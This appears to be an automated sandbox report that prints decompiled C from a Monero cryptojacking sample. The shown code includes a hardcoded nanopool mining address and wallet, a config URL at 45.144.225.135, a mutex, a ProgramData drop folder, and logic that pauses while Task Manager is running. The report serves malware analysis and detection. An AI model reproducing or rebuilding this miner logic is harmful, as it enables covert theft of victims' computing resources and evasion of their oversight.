                                                                                                        0x004069b2
                                                                                                        0x004069b6
                                                                                                        0x004069bd
                                                                                                        0x004069c4
                                                                                                        0x004069cb
                                                                                                        0x004069d2
                                                                                                        0x004069d7
                                                                                                        0x004069ef
                                                                                                        0x004069f6
                                                                                                        0x00406a00
                                                                                                        0x00406a0b
                                                                                                        0x00406a1d
                                                                                                        0x00406a24
                                                                                                        0x00406a2b
                                                                                                        0x00406a34

                                                                                                        APIs
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(uh@,uh@,00000000,00000000), ref: 004069D7
                                                                                                        • NtCreateFile.NTDLL(005D2DFC,00120089,00000018,00000000,00000000,00000080,00000000,00000001,00000060,00000000,00000000), ref: 00406A2B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$CreateFileNameName_
                                                                                                        • String ID: uh@$uh@
                                                                                                        • API String ID: 3479931691-972736353
                                                                                                        • Opcode ID: 45a6eada9ea1dd906960385c986ed5d86993abecfb8ffa17f30c1ee7e5eb38c1
                                                                                                        • Instruction ID: 0c139073421148209480b6c35fda580d69656a2aecaa2f90744c4bda58df8354
                                                                                                        • Opcode Fuzzy Hash: 45a6eada9ea1dd906960385c986ed5d86993abecfb8ffa17f30c1ee7e5eb38c1
                                                                                                        • Instruction Fuzzy Hash: E811DBB4D5031DABEB10DF90CD49BEEBBB8BB04704F10420AE9007A2C0D7B522988F99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403B50, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E00403B50(void* __edx, char _a4, intOrPtr _a8) {
				void* _t6;
				void* _t7;
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;

				_t11 = __edx;
				E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
				_t6 =  *0x5d2df4; // 0x320
				_t13 = _t12 + 0x10;
				if(_t6 != 0 && _t6 != 0xffffffff) {
					NtClose(_t6);
				}
				_push(_a8);
				_t7 = E00403BC0(_a4); // executed
				_t14 = _t13 + 8;
				if(_t7 != 0) {
					_push(_a8);
					E00403680(_t11, _a4); // executed
					_t14 = _t14 + 8;
				}
				return E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
			}









                                                                                                        0x00403b50
                                                                                                        0x00403b64
                                                                                                        0x00403b69
                                                                                                        0x00403b6e
                                                                                                        0x00403b73
                                                                                                        0x00403b7b
                                                                                                        0x00403b7b
                                                                                                        0x00403b81
                                                                                                        0x00403b87
                                                                                                        0x00403b8c
                                                                                                        0x00403b91
                                                                                                        0x00403b93
                                                                                                        0x00403b99
                                                                                                        0x00403b9e
                                                                                                        0x00403b9e
                                                                                                        0x00403bbb

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID: 0125789244697858$0125789244697858$xmr-us-east1.nanopool.org:14444
                                                                                                        • API String ID: 3535843008-899868268
                                                                                                        • Opcode ID: 05ddcafc9e6955f83f09dbcfd663fe33b0abdaadcb5b8f1db937436fe77c1a83
                                                                                                        • Instruction ID: b842e7685c2f69810a8eda15092c5b8a142aacb66778a7cb45de6b9a8cdd56ec
                                                                                                        • Opcode Fuzzy Hash: 05ddcafc9e6955f83f09dbcfd663fe33b0abdaadcb5b8f1db937436fe77c1a83
                                                                                                        • Instruction Fuzzy Hash: 5EF0B43168120476EF203F999C03E493E585B2475EF004527FE18742E3E5BAD275955E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408A50, Relevance: 6.1, APIs: 4, Instructions: 52nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 63%
                                                                                                        			E00408A50(void* _a4) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				long _v28;
				long _v32;
				long _v36;
				void* _v40;
				void* _t21;
				void* _t27;
				int _t28;

				_t21 = _a4;
				if(_t21 != 0) {
					_v16 = _t21;
					_a4 = 0;
					_v40 = 0x18;
					_v36 = 0;
					_v28 = 0;
					_v32 = 0;
					_v24 = 0;
					_v20 = 0;
					_v12 = 0;
					if(NtOpenProcess( &_a4, 0x400,  &_v40,  &_v16) != 0) {
						goto L1;
					} else {
						_t27 = _a4;
						if(_t27 == 0) {
							goto L1;
						} else {
							_v8 = 0;
							_t28 = GetExitCodeProcess(_t27,  &_v8); // executed
							_push(_a4);
							if(_t28 != 0) {
								NtClose(); // executed
								return 0 | _v8 == 0x00000103;
							} else {
								return NtClose() | 0xffffffff; // executed
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}















                                                                                                        0x00408a53
                                                                                                        0x00408a5b
                                                                                                        0x00408a63
                                                                                                        0x00408a6d
                                                                                                        0x00408a7d
                                                                                                        0x00408a85
                                                                                                        0x00408a8c
                                                                                                        0x00408a93
                                                                                                        0x00408a9a
                                                                                                        0x00408aa1
                                                                                                        0x00408aa8
                                                                                                        0x00408ab7
                                                                                                        0x00000000
                                                                                                        0x00408ab9
                                                                                                        0x00408ab9
                                                                                                        0x00408abe
                                                                                                        0x00000000
                                                                                                        0x00408ac0
                                                                                                        0x00408ac3
                                                                                                        0x00408acc
                                                                                                        0x00408ad2
                                                                                                        0x00408ad7
                                                                                                        0x00408ae6
                                                                                                        0x00408afb
                                                                                                        0x00408ad9
                                                                                                        0x00408ae5
                                                                                                        0x00408ae5
                                                                                                        0x00408ad7
                                                                                                        0x00408abe
                                                                                                        0x00408a5d
                                                                                                        0x00408a5d
                                                                                                        0x00408a62
                                                                                                        0x00408a62

                                                                                                        APIs
                                                                                                        • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00408AAF
                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00408ACC
                                                                                                        • NtClose.NTDLL(00000000), ref: 00408AD9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CloseCodeExitOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2358878597-0
                                                                                                        • Opcode ID: 68b3489fe5460219a3091c2dd7fb609aeb590185205d4daf2d69748998342c46
                                                                                                        • Instruction ID: 1b6c16884e814be030dd65664031e946cab864b4b59cb1ac47a8a8f8596fd444
                                                                                                        • Opcode Fuzzy Hash: 68b3489fe5460219a3091c2dd7fb609aeb590185205d4daf2d69748998342c46
                                                                                                        • Instruction Fuzzy Hash: 55111F71A0120CAFDF10DFA0C9487EE7BF8AB04354F10456AE818E6280EB799B48DF95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004068E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 16%
                                                                                                        			E004068E0(intOrPtr _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				char* _v44;
				long _v48;
				void* _v52;
				long _t25;

				_v52 = 0;
				asm("xorps xmm0, xmm0");
				_v32 = 0;
				asm("movups [ebp-0x2c], xmm0");
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				asm("movq [ebp-0x8], xmm0");
				 *0x5d10b8(_a4,  &_v12, 0, 0);
				_v52 = 0x18;
				_v44 =  &_v12;
				_v48 = 0;
				_v40 = 0x40;
				_v36 = 0;
				_v32 = 0;
				_t25 = NtCreateFile(0x5d2df8, 0x120089,  &_v52,  &_v28,  &_v20, 0x80, 0, 1, 0x60, 0, 0); // executed
				return _t25;
			}















                                                                                                        0x004068ed
                                                                                                        0x004068f8
                                                                                                        0x004068fb
                                                                                                        0x00406902
                                                                                                        0x00406906
                                                                                                        0x0040690d
                                                                                                        0x00406914
                                                                                                        0x0040691b
                                                                                                        0x00406922
                                                                                                        0x00406927
                                                                                                        0x0040693f
                                                                                                        0x00406946
                                                                                                        0x00406950
                                                                                                        0x0040695b
                                                                                                        0x0040696d
                                                                                                        0x00406974
                                                                                                        0x0040697b
                                                                                                        0x00406984

                                                                                                        APIs
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(004068C5,004068C5,00000000,00000000), ref: 00406927
                                                                                                        • NtCreateFile.NTDLL(005D2DF8,00120089,00000018,00000000,00000000,00000080,00000000,00000001,00000060,00000000,00000000), ref: 0040697B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$CreateFileNameName_
                                                                                                        • String ID: @
                                                                                                        • API String ID: 3479931691-2766056989
                                                                                                        • Opcode ID: 16fa837f9bc0ff09cc67a8f66bfc36083248c74de5f80e8970ab7ff66bd66588
                                                                                                        • Instruction ID: fb5b581ab8e3c93d90c851d27248355ddc5a87700a0b749ee16a3b9d52e94ed7
                                                                                                        • Opcode Fuzzy Hash: 16fa837f9bc0ff09cc67a8f66bfc36083248c74de5f80e8970ab7ff66bd66588
                                                                                                        • Instruction Fuzzy Hash: FC11DBB4D5031DABEB10DF90CD49BEEBBB8BB04704F10420AE9107A2C0D7B522888F99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E00403680(signed int __edx, char _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				char* _v36;
				long _v40;
				void* _v44;
				long _t20;
				void* _t21;
				signed int _t23;

				_t23 = __edx;
				asm("xorps xmm0, xmm0");
				_v24 = 0;
				asm("movups [ebp-0x24], xmm0");
				_v20 = 0;
				_v36 =  &_a4;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0x40;
				_v28 = 0;
				_v24 = 0;
				_t20 = NtCreateFile(0x5d2df4, 0x120089,  &_v44,  &_v20,  &_v12, 0x80, 0, 1, 0x60, 0, 0);
				_t21 =  *0x5d2df4; // 0x320
				_t22 =  !=  ? _t23 | 0xffffffff : _t21;
				 *0x5d2df4 =  !=  ? _t23 | 0xffffffff : _t21;
				return _t20;
			}
















                                                                                                        0x00403680
                                                                                                        0x00403690
                                                                                                        0x00403693
                                                                                                        0x0040369a
                                                                                                        0x004036a6
                                                                                                        0x004036ad
                                                                                                        0x004036b7
                                                                                                        0x004036c2
                                                                                                        0x004036d4
                                                                                                        0x004036db
                                                                                                        0x004036e2
                                                                                                        0x004036e9
                                                                                                        0x004036f0
                                                                                                        0x004036f7
                                                                                                        0x004036fe
                                                                                                        0x00403704
                                                                                                        0x0040370f
                                                                                                        0x00403712
                                                                                                        0x0040371b

                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(005D2DF4,00120089,?,00000000,?,00000080,00000000,00000001,00000060,00000000,00000000), ref: 004036FE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID: @
                                                                                                        • API String ID: 823142352-2766056989
                                                                                                        • Opcode ID: 0251f1d50f9b636af99753684b82d5b31b70b56ad5df258657e6c05342283ce3
                                                                                                        • Instruction ID: 3021d29c1a01cdcb7ce1e86a2c6713ee4fd4a7efed1c7ac6ce7211f4987aa3f7
                                                                                                        • Opcode Fuzzy Hash: 0251f1d50f9b636af99753684b82d5b31b70b56ad5df258657e6c05342283ce3
                                                                                                        • Instruction Fuzzy Hash: B2015EB0D4130CABEB14DF90CD49BDEBBF9BF18304F10420AE505762C0D7B516488B98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404470, Relevance: 86.2, APIs: 29, Strings: 20, Instructions: 457synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			_entry_() {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				intOrPtr _v16;
				char _v20;
				int _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				long _v32;
				long _v36;
				char _v38;
				short _v40;
				char _v48;
				char _v72;
				char _v592;
				char _v1112;
				char _v2136;
				char _v3160;
				void _v7224;
				long _t56;
				signed int _t61;
				void* _t65;
				long _t66;
				void* _t72;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				int _t80;
				void* _t82;
				void* _t84;
				void* _t89;
				void* _t90;
				void* _t91;
				intOrPtr _t93;
				void* _t94;
				long _t96;
				long _t99;
				void* _t102;
				char _t110;
				char _t114;
				char _t117;
				char _t119;
				short _t120;
				void* _t125;
				void* _t137;
				void* _t139;
				void* _t140;
				void* _t145;
				signed int _t148;
				char _t150;
				void* _t153;
				void* _t158;
				intOrPtr _t160;
				struct _SECURITY_ATTRIBUTES* _t161;
				void* _t166;
				struct _SECURITY_ATTRIBUTES* _t168;
				intOrPtr _t169;
				void* _t171;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t196;
				void* _t223;
				void* _t224;
				void* _t225;
				void* _t226;
				void* _t234;

				_v8 = 0;
				_v12 = 0;
				_v28 = 0;
				_t56 = GetTickCount();
				_t150 = 0;
				_v32 = _t56;
				_v36 = _t56;
				_v24 = 0;
				 *0x5d2df4 = 0;
				E00401670("xmr-us-east1.nanopool.org:14444", 0, 0xcc8);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x10], xmm0");
				E00401BB0( &_v7224, 0, 0xfe0);
				memcpy("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  &_v7224, 0x3f8 << 2);
				_t152 = 0;
				_t61 = SetErrorMode(2); // executed
				SetErrorMode(_t61 | 0x00000002); // executed
				E004017E0("e9c1286a28d82a2d0ee6", "e9c1286a28d82a2d0ee6");
				_t174 = _t171 + 0x2c;
				_t65 = CreateMutexA(0, 0, "e9c1286a28d82a2d0ee6"); // executed
				if(_t65 == 0) {
					ExitProcess(0x1e);
				}
				_t158 = GetLastError;
				_t66 = GetLastError();
				_t191 = _t66 - 0xb7;
				if(_t66 == 0xb7) {
					ExitProcess(0x1f);
				}
				E00403220(0, SetErrorMode, _t191);
				_t166 = CommandLineToArgvW(GetCommandLineW(),  &_v24);
				if(_t166 != 0 && _v24 > 1) {
					_t148 = E004019C0( *((intOrPtr*)(_t166 + 4)), L"--show-window");
					_t174 = _t174 + 8;
					asm("sbb eax, eax");
					 *0x5d1bb8 =  *0x5d1bb8 &  ~_t148;
				}
				LocalFree(_t166);
				_t72 = E00401000(_t152, _t158, _t166,  *0x5d1314); // executed
				_t175 = _t174 + 4;
				_t195 = _t72;
				if(_t72 != 0) {
					E00408070(_t152, _t195, "d06ed635-68f6-4e9a-955c-4899f5f57b9a"); // executed
					_t176 = _t175 + 4;
					_t196 =  *0x5d1bc0 - _t150; // 0x0
					if(_t196 != 0) {
						E004017E0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						_t176 = _t176 + 8;
					}
					_t74 = E00401600("LKBNMTFJgl", "LKBNMTFJgl");
					_t177 = _t176 + 8;
					if(_t74 != 0) {
						_t75 = E00401600("csrss.exe", "csrss.exe");
						_t178 = _t177 + 8;
						if(_t75 != 0) {
							_t76 = E00401600("viTRMUuKeV", "viTRMUuKeV");
							_t179 = _t178 + 8;
							if(_t76 != 0) {
								_t77 = E00407FA0(_t152, "C:\ProgramData\LKBNMTFJgl", 0x40aae0, 0x23); // executed
								_t180 = _t179 + 0xc;
								if(_t77 != 0) {
									E00401970("C:\ProgramData\LKBNMTFJgl", "\\");
									E00401970("C:\ProgramData\LKBNMTFJgl", "LKBNMTFJgl");
									_t181 = _t180 + 0x10;
									_t80 = CreateDirectoryW("C:\ProgramData\LKBNMTFJgl", 0); // executed
									if(_t80 != 0 || GetLastError() == 0xb7) {
										if(E00408DD0() != 0 &&  *0x5d210c == 1) {
											_t145 = CreateThread(0, 0, E00408450, 0, 0, 0); // executed
											 *0x5d211c = _t145;
										}
										_t82 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
										_t182 = _t181 + 8;
										if(_t82 == 0) {
											L33:
											_t84 = E00403150( &_v1112); // executed
											_t183 = _t182 + 4;
											if(_t84 != 0) {
												E004030B0( &_v1112,  &_v2136,  &_v3160);
												__imp__SetThreadExecutionState(0x80000041, 0);
												_t89 = E00403CA0(_t152, _t153, 1, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c); // executed
												_t185 = _t183 + 0x24;
												if(_t89 == 0) {
													L91:
													ExitProcess(0x3d);
												}
												_t90 = E00403CA0(_t152, _t153, 0, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c); // executed
												_t186 = _t185 + 0x14;
												if(_t90 == 0) {
													goto L91;
												}
												L38:
												while(1) {
													if( *0x5d1300 != 0) {
														_t169 = _v28;
														if(_t169 == 0) {
															_t96 = GetTickCount();
															_t215 = _t96 - _v36 - 0x4e20;
															if(_t96 - _v36 > 0x4e20) {
																E004065D0(_t215); // executed
																_t170 =  !=  ? 1 : _t169;
																_v28 =  !=  ? 1 : _t169;
															}
														}
													}
													if( *0x5d1308 == 3) {
														_t160 =  *0x5d1310; // 0x7530
														_t161 = _t160 + 1;
														__eflags = _t161;
													} else {
														_t161 = E00408040();
													}
													_t91 = E00408A50(_t150); // executed
													_t187 = _t186 + 4;
													_t168 =  ==  ? 1 : _t91;
													if( *0x5d1304 == 0) {
														_t93 = _v12;
													} else {
														_t93 = E00407EF0("taskmgr.exe"); // executed
														_t187 = _t187 + 4;
														_v12 = _t93;
													}
													if(_t150 == 0 || _t168 == 0) {
														if(_t93 != 0) {
															goto L58;
														}
														_t223 =  *0x5d1320 - _t93; // 0x0
														if(_t223 != 0) {
															goto L58;
														}
														_t224 =  *0x5d2110 - _t93; // 0x0
														if(_t224 != 0) {
															goto L58;
														}
														_t225 = _t161 -  *0x5d1310; // 0x7530
														if(_t225 <= 0) {
															__eflags =  *0x5d1308;
															if( *0x5d1308 != 0) {
																_t117 = E00403050(_t150, _t152,  &_v2136, 0); // executed
																_t187 = _t187 + 8;
																_t150 = _t117;
																_t168 = 1;
															}
															_v8 = 0;
															goto L68;
														}
														_t119 = E00403050(_t150, _t152,  &_v3160, _t93);
														_t187 = _t187 + 8;
														_v8 = 1;
														_t150 = _t119;
														_t168 = 1;
														goto L59;
													} else {
														L58:
														__eflags = _v8;
														if(_v8 == 0) {
															L68:
															_t234 = _t161 -  *0x5d1310; // 0x7530
															if(_t234 <= 0) {
																L75:
																__eflags = _v12;
																if(_v12 == 0) {
																	L77:
																	if( *0x5d1320 == 0) {
																		L79:
																		if( *0x5d2110 == 0) {
																			L82:
																			_t94 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
																			_t186 = _t187 + 8;
																			if(_t94 != 0) {
																				_t99 = GetTickCount();
																				_t152 =  *0x5d1bb4 * 0xea60;
																				_t245 = _t99 - _v32 -  *0x5d1bb4 * 0xea60;
																				if(_t99 - _v32 >  *0x5d1bb4 * 0xea60) {
																					_v32 = GetTickCount();
																					_t102 = E00404DE0(_t152, _t153, _t245, "http://45.144.225.135/config.txt", "FALSE", "xmr-us-east1.nanopool.org:14444", _t150, _t168);
																					_t186 = _t186 + 0x14;
																					if(_t102 != 0) {
																						if(E004039B0(_t153) != 0) {
																							if(_t168 != 0) {
																								E00408730(_t150);
																								_t186 = _t186 + 4;
																							}
																							E00403CA0(_t152, _t153, 1, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c);
																							E00403CA0(_t152, _t153, 0, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c);
																							_t186 = _t186 + 0x28;
																						}
																						E00403B50(_t153, _v20, _v16);
																						_t186 = _t186 + 8;
																					}
																				}
																			}
																			Sleep(0xfa0); // executed
																			continue;
																		}
																		L80:
																		if(_t168 == 0) {
																			goto L82;
																		}
																		L81:
																		E00408730(_t150);
																		_t187 = _t187 + 4;
																		_t168 = 0;
																		goto L82;
																	}
																	L78:
																	if(_t168 != 0) {
																		goto L81;
																	}
																	goto L79;
																}
																L76:
																__eflags = _t168;
																if(_t168 != 0) {
																	goto L81;
																}
																goto L77;
															}
															if(_v12 != 0) {
																goto L76;
															}
															if( *0x5d1320 != 0) {
																goto L78;
															}
															if( *0x5d2110 != 0) {
																goto L80;
															}
															if(_t168 != 0) {
																E00408730(_t150);
																_t187 = _t187 + 4;
															}
															_t110 = E00403050(_t150, _t152,  &_v3160, 0);
															_t187 = _t187 + 8;
															_v8 = 1;
															_t150 = _t110;
															_t168 = 1;
															goto L77;
														}
														L59:
														_t226 = _t161 -  *0x5d1310; // 0x7530
														if(_t226 > 0) {
															goto L75;
														}
														if(_v12 != 0) {
															goto L76;
														}
														if( *0x5d1320 != 0) {
															goto L78;
														}
														if( *0x5d2110 != 0) {
															goto L80;
														}
														if(_t168 != 0) {
															E00408730(_t150);
															_t187 = _t187 + 4;
															_t168 = 0;
														}
														if( *0x5d1308 != 0) {
															_t114 = E00403050(_t150, _t152,  &_v2136, 0);
															_t187 = _t187 + 8;
															_t150 = _t114;
															_t168 = 1;
														}
														_v8 = 0;
														goto L68;
													}
												}
											}
											ExitProcess(0x1c);
										} else {
											_t120 =  *0x5d2074; // 0x3832
											asm("movq xmm0, [0x5d206c]");
											_v40 = _t120;
											asm("movq [ebp-0x2c], xmm0");
											_v38 = _t150;
											E00401A00( &_v592, "C:\ProgramData\LKBNMTFJgl");
											_t125 = E00401600( &_v72,  &_v48);
											_t183 = _t182 + 0x10;
											if(_t125 == 0) {
												ExitProcess(0x2f);
											}
											E00401970( &_v592, "\\");
											E00401970( &_v592,  &_v72);
											E00401970( &_v592, "_");
											E00401970( &_v592, L"3.1.0");
											_t188 = _t183 + 0x20;
											_t137 =  *0x5d10b8( &_v592,  &_v20, 0, 0);
											_t207 = _t137 - 1;
											if(_t137 == 1) {
												_t139 = E004037E0(_t207,  &_v592); // executed
												_t189 = _t188 + 4;
												_t208 = _t139;
												if(_t139 != 0) {
													E004039B0(_t153);
													_push(_v16);
													E00403680(_t153, _v20);
													_t189 = _t189 + 8;
												}
												_t140 = E00404DE0(_t152, _t153, _t208, "http://45.144.225.135/config.txt", "FALSE", "xmr-us-east1.nanopool.org:14444", 0, 0); // executed
												_t182 = _t189 + 0x14;
												if(_t140 != 0) {
													E004039B0(_t153);
													E00403B50(_t153, _v20, _v16); // executed
													_t182 = _t182 + 8;
												}
												goto L33;
											}
											ExitProcess(0x3c);
										}
									} else {
										ExitProcess(0x32);
									}
								}
								ExitProcess(0x31);
							}
							ExitProcess(0x30);
						}
						ExitProcess(0x30);
					} else {
						ExitProcess(0x30);
					}
				}
				ExitProcess(0x3b);
			}

















































































                                                                                                        0x0040447e
                                                                                                        0x00404481
                                                                                                        0x00404484
                                                                                                        0x00404487
                                                                                                        0x0040448d
                                                                                                        0x0040448f
                                                                                                        0x0040449d
                                                                                                        0x004044a0
                                                                                                        0x004044a3
                                                                                                        0x004044a9
                                                                                                        0x004044b9
                                                                                                        0x004044be
                                                                                                        0x004044c3
                                                                                                        0x004044db
                                                                                                        0x004044db
                                                                                                        0x004044e5
                                                                                                        0x004044eb
                                                                                                        0x004044f7
                                                                                                        0x004044fc
                                                                                                        0x00404506
                                                                                                        0x0040450e
                                                                                                        0x00404512
                                                                                                        0x00404512
                                                                                                        0x00404518
                                                                                                        0x0040451e
                                                                                                        0x00404520
                                                                                                        0x00404525
                                                                                                        0x00404529
                                                                                                        0x00404529
                                                                                                        0x0040452f
                                                                                                        0x00404545
                                                                                                        0x00404549
                                                                                                        0x00404559
                                                                                                        0x0040455e
                                                                                                        0x00404563
                                                                                                        0x00404565
                                                                                                        0x00404565
                                                                                                        0x0040456c
                                                                                                        0x00404578
                                                                                                        0x0040457d
                                                                                                        0x00404580
                                                                                                        0x00404582
                                                                                                        0x00404591
                                                                                                        0x00404596
                                                                                                        0x00404599
                                                                                                        0x0040459f
                                                                                                        0x004045ab
                                                                                                        0x004045b0
                                                                                                        0x004045b0
                                                                                                        0x004045bd
                                                                                                        0x004045c2
                                                                                                        0x004045c7
                                                                                                        0x004045db
                                                                                                        0x004045e0
                                                                                                        0x004045e5
                                                                                                        0x004045f9
                                                                                                        0x004045fe
                                                                                                        0x00404603
                                                                                                        0x00404619
                                                                                                        0x0040461e
                                                                                                        0x00404623
                                                                                                        0x00404637
                                                                                                        0x00404646
                                                                                                        0x0040464b
                                                                                                        0x00404655
                                                                                                        0x0040465d
                                                                                                        0x00404677
                                                                                                        0x00404691
                                                                                                        0x00404697
                                                                                                        0x00404697
                                                                                                        0x004046a6
                                                                                                        0x004046ab
                                                                                                        0x004046b0
                                                                                                        0x004047b8
                                                                                                        0x004047bf
                                                                                                        0x004047c4
                                                                                                        0x004047c9
                                                                                                        0x004047f2
                                                                                                        0x004047ff
                                                                                                        0x0040481c
                                                                                                        0x00404821
                                                                                                        0x00404826
                                                                                                        0x00404af0
                                                                                                        0x00404af2
                                                                                                        0x00404af2
                                                                                                        0x00404843
                                                                                                        0x00404848
                                                                                                        0x0040484d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404853
                                                                                                        0x0040485f
                                                                                                        0x00404861
                                                                                                        0x00404866
                                                                                                        0x00404868
                                                                                                        0x00404871
                                                                                                        0x00404876
                                                                                                        0x00404878
                                                                                                        0x0040487f
                                                                                                        0x00404882
                                                                                                        0x00404882
                                                                                                        0x00404876
                                                                                                        0x00404866
                                                                                                        0x0040488c
                                                                                                        0x00404897
                                                                                                        0x0040489d
                                                                                                        0x0040489d
                                                                                                        0x0040488e
                                                                                                        0x00404893
                                                                                                        0x00404893
                                                                                                        0x0040489f
                                                                                                        0x004048a6
                                                                                                        0x004048b1
                                                                                                        0x004048bb
                                                                                                        0x004048cf
                                                                                                        0x004048bd
                                                                                                        0x004048c2
                                                                                                        0x004048c7
                                                                                                        0x004048ca
                                                                                                        0x004048ca
                                                                                                        0x004048d4
                                                                                                        0x004048dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004048de
                                                                                                        0x004048e4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004048e6
                                                                                                        0x004048ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004048ee
                                                                                                        0x004048f4
                                                                                                        0x00404916
                                                                                                        0x0040491d
                                                                                                        0x00404928
                                                                                                        0x0040492d
                                                                                                        0x00404930
                                                                                                        0x00404932
                                                                                                        0x00404932
                                                                                                        0x00404937
                                                                                                        0x00000000
                                                                                                        0x00404937
                                                                                                        0x004048fe
                                                                                                        0x00404903
                                                                                                        0x00404906
                                                                                                        0x0040490d
                                                                                                        0x0040490f
                                                                                                        0x00000000
                                                                                                        0x00404940
                                                                                                        0x00404940
                                                                                                        0x00404940
                                                                                                        0x00404944
                                                                                                        0x004049ab
                                                                                                        0x004049ab
                                                                                                        0x004049b1
                                                                                                        0x004049f9
                                                                                                        0x004049f9
                                                                                                        0x004049fd
                                                                                                        0x00404a03
                                                                                                        0x00404a0a
                                                                                                        0x00404a10
                                                                                                        0x00404a17
                                                                                                        0x00404a28
                                                                                                        0x00404a32
                                                                                                        0x00404a37
                                                                                                        0x00404a3c
                                                                                                        0x00404a48
                                                                                                        0x00404a4a
                                                                                                        0x00404a57
                                                                                                        0x00404a59
                                                                                                        0x00404a72
                                                                                                        0x00404a75
